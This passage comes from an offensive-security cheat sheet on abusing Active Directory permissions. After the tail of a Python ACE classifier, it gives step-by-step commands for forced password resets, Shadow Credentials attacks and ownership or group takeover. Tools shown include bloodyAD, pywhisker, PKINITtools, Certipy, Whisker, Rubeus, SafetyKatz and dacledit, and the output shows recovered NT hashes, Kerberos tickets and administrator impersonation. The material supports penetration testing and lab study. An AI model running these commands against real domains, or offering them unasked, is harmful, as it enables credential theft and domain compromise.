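    found += [name for flag, name in (("WriteProperty", "AddMember"), ("Self", "AddSelf"))
              if on_member and has(flag)]
    return found

# Sample ACEs rebuilt from the PowerView output on this page (same masks, GUIDs and DNs).
SAMPLE_ACES = [
    Ace("wley", "CN=Dana Amundsen,OU=DevOps,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL",
        256, "00299570-246d-11d0-a768-00aa006e0529", "user"),
    Ace("damundsen", "CN=Help Desk Level 1,OU=Security Groups,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL",
        131132, NULL_GUID, "group"),
    Ace("Information Technology", "CN=Angela Dunn,OU=Server Admin,OU=IT,OU=HQ-NYC,OU=Employees,OU=Corp,DC=INLANEFREIGHT,DC=LOCAL",
        983551, NULL_GUID, "user"),
    Ace("adunn", "DC=INLANEFREIGHT,DC=LOCAL", 256, "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2", "domainDNS"),
]
# Constructed: the RBCD step-2 SDDL with a made-up computer SID in place of $ComputerSid.
SAMPLE_RBCD_SDDL = "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1111111111-2222222222-3333333333-1105)"
```

Running `classify` over `SAMPLE_ACES` yields ForceChangePassword; GenericWrite, AddMember, AddSelf; GenericAll; and ExtendedRight:DS-Replication-Get-Changes, while the RBCD descriptor decodes to GenericAll for the attacker-controlled computer SID.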

## AllExtendedRights

Change password

```
bloodyAD --host "192.168.1.8" -d "ignite.local" -u "geet" -p "Password@1" set password "kavish" "Password@987"
```

{% embed url="<https://www.hackingarticles.in/abusing-ad-dacl-allextendedrights/>" %}

## Shadow Credentials

{% embed url="<https://pentestlab.blog/2022/02/07/shadow-credentials/>" %}

{% embed url="<https://www.thehacker.recipes/ad/movement/kerberos/shadow-credentials>" %}

{% embed url="<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/shadow-credentials>" %}

{% embed url="<https://posts.specterops.io/shadow-credentials-abusing-key-trust-account-mapping-for-takeover-8ee1a53566ab>" %}

Pre-requisites to abuse Shadow Credentials:

* AD CS (Key Trust if AD CS is not present)
* Support for PKINIT and at least one DC with Windows Server 2016 or above.
* Permissions (**GenericWrite/GenericAll**) to modify the `msDS-KeyCredentialLink` attribute of the target object.

In BloodHound: `AddKeyCredentialLink`

{% embed url="<https://0xdf.gitlab.io/2023/05/27/htb-absolute.html>" %}

### Linux - Pywhisker

{% embed url="<https://github.com/ShutdownRepo/pywhisker>" %}

pywhisker issue

```
[!] module 'OpenSSL.crypto' has no attribute 'PKCS12'
```

<figure><img src="/files/artpP33nCisYbBPItVA0" alt=""><figcaption></figcaption></figure>

Troubleshooting:

<https://github.com/ShutdownRepo/pywhisker/issues/17>

<figure><img src="/files/CMCh7RvT5rmfj2ONrGCJ" alt=""><figcaption></figcaption></figure>

```
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$  rm requirements.txt
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$  vim requirements.txt
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$ cat requirements.txt 
impacket
pyOpenSSL==24.0.0
cryptography
six
pyasn1
ldap3
ldapdomaindump
rich
setuptools
dsinternals
┌──(kali㉿kali)-[~/Desktop/pywhisker]
└─$ pip3 install -r requirements.txt    
```

{% embed url="<https://github.com/dirkjanm/PKINITtools/tree/master>" %}

```
$ pywhisker.py -d "domain.htb" -u "owned" -H aad3b435b51**********5b51404ee:7fc6************b5a85a -td targetdomain.local --target "target" --action "list"
$ pywhisker.py -d "domain.htb" -u "owned" -H aad3b435b51**********5b51404ee:7fc6************b5a85a -td targetdomain.local --target "target" --action "add"
<--SNIP-->
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: QZrd2HfW.pfx
[*] Must be used with password: 7ZoeJDqSZnv5CtHwNY8K
[*] A TGT can now be obtained with
$ gettgtpkinit.py -cert-pfx QZrd2HfW.pfx -pfx-pass 7ZoeJDqSZnv5CtHwNY8K targetdomain.local/target QZrd2HfW.ccache
<--SNIP-->
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-03-17 05:05:07,420 minikerberos INFO     9b0312752bf1042f8a34616e8e641704c11aa0a08b4c6420e04f9bb32b4a1998
$ export KRB5CCNAME=QZrd2HfW.ccache
$ getnthash.py targetdomain.local/target -key 9b0312752bf1042f8a34616e8e641704c11aa0a08b4c6420e04f9bb32b4a1998 -debug -dc-ip [IP]
<--SNIP-->
Recovered NT Hash
cf3a*************ed5c58
```

```
┌──(kali㉿kali)-[~/Desktop/pywhisker/pywhisker]
└─$ python pywhisker.py -d "domain.htb" -u "controlledUser" -p "password" --target "targetedUser" --action "add" --dc-ip 10.10.11.41
[*] Searching for the target account
[*] Target user found: CN=targetted user,CN=Users,DC=domain,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: cf165020-4ec3-8daf-508f-259e8d1432dd
[*] Updating the msDS-KeyCredentialLink attribute of targettedUser
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: Nroyxf0a.pfx
[*] Must be used with password: k9NDc9ioP2ctBPVjCxVg
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools

┌──(kali㉿kali)-[~/Desktop/PKINITtools]
└─$ sudo ntpdate dc01.domain.htb | python gettgtpkinit.py domain.htb/targettedUser -cert-pfx /home/kali/Desktop/pywhisker/pywhisker/Nroyxf0a.pfx -pfx-pass 'k9NDc9ioP2ctBPVjCxVg' targettedUser.ccache
2024-11-26 12:32:49,589 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-11-26 12:32:49,617 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
2024-11-26 12:32:52,984 minikerberos INFO     AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2024-11-26 12:32:52,984 minikerberos INFO     e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
INFO:minikerberos:e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
2024-11-26 12:32:52,988 minikerberos INFO     Saved TGT to file
INFO:minikerberos:Saved TGT to file

┌──(kali㉿kali)-[~/Desktop/PKINITtools]
└─$ sudo ntpdate dc01.domain.htb | python getnthash.py domain.htb/targettedUser -key e0d4ce3341797354ca80223549a358554596114362dd3d532450cbc7709cf852
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c1832bcdd4677c28b5a6a1295584
```

### Certipy

shadow auto

```
[Mar 11, 2024 - 08:59:19 (CET)] exegol-Zephyr /workspace # proxychains -q certipy shadow auto -u "owned@domain.local" -p 'password' -account 'target_account' -dns-tcp -dc-ip [IP]
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'target_account'
<--SNIP-->
[*] Successfully restored the old Key Credentials for 'ZPH-SVRMGMT1$'
[*] NT hash for 'target_account': 89d0*************ef2f
```

### Abusing User Object

Enumerate the permissions.

```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match "StudentUsers"}
```

Add the Shadow Credential.

{% embed url="<https://github.com/eladshamir/Whisker>" %}

```powershell
Whisker.exe add /target:supportXuser
```

Linux: pyWhisker (see The Hacker Recipes)

{% embed url="<https://github.com/ShutdownRepo/pywhisker>" %}

Using PowerView, see if the Shadow Credential is added.

```powershell
Get-DomainUser -Identity supportXuser
```

Request the TGT by leveraging the certificate.

```powershell
Rubeus.exe asktgt /user:supportXuser /certificate:MIIJuAIBA<-SNIP-> /password:"1O<-SNIP->" /domain:domain.local /dc:DC.domain.local /getcredentials /show /nowrap
```

Inject the TGT in the current session or use the NTLM hash

```powershell
Rubeus.exe ptt /ticket:<base64_tgt>
```

### Abusing Computer Object

Enumerate the permissions.

```powershell
Find-InterestingDomainAcl -ResolveGUIDs | ?{$_.IdentityReferenceName -match 'mgmtadmin'}
```

Add the Shadow Credentials.

```powershell
SafetyKatz.exe "sekurlsa::pth /user:mgmtadmin /domain:domain.local /aes256:<aes_key> /run:cmd.exe" "exit"
```

```powershell
Whisker.exe add /target:computer$
```

Using PowerView, see if the Shadow Credential is added.

```powershell
Get-DomainComputer -Identity computer
```

Request the TGT by leveraging the certificate.

```powershell
Rubeus.exe asktgt /user:computer$ /certificate:MIIJ0AIBA<-SNIP-> /password:"ViG<-SNIP->" /domain:domain.local /dc:DC.domain.local /getcredentials /show
```

Request and Inject the TGS by impersonating the user.

```powershell
Rubeus.exe s4u /dc:dc.domain.local /ticket:<base64_tgt> /impersonateuser:administrator /ptt /self /altservice:cifs/computer
```

### ShadowSpray

{% embed url="<https://github.com/Dec0ne/ShadowSpray/>" %}

## WriteOwner

{% embed url="<https://www.thehacker.recipes/ad/movement/dacl/grant-ownership#grant-ownership>" %}

{% embed url="<https://github.com/CravateRouge/bloodyAD>" %}

Grant Ownership

```
bloodyAD --host $dc -d $domain -u $username -p $password set owner $target_group $target_username
```

```
./bloodyAD.py --host "10.10.11.41" -d "DC01.domain.local" -u "controlledUser" -p "password" set owner "CN=Management,CN=Users,DC=domain,DC=local" "CN=Controlled User,CN=Users,DC=domain,DC=local"
```

Grant yourself the `AddMember` privilege

```
dacledit.py -action 'write' -rights 'WriteMembers' -principal 'controlledUser' -target-dn 'CN=Management,CN=Users,DC=domain,DC=local' -dc-ip '10.10.11.41' 'domain.local'/'controlledUser':'password'
```

Add member

```
./bloodyAD.py --host "10.10.11.41" -d "domain.local" -u "controlledUser" -p "password" add groupMember "CN=Management,CN=Users,DC=domain,DC=local" "CN=controlled User,CN=Users,DC=domain,DC=local"
```

## Resources

{% embed url="<https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/abusing-active-directory-acls-aces#genericall-on-group>" %}


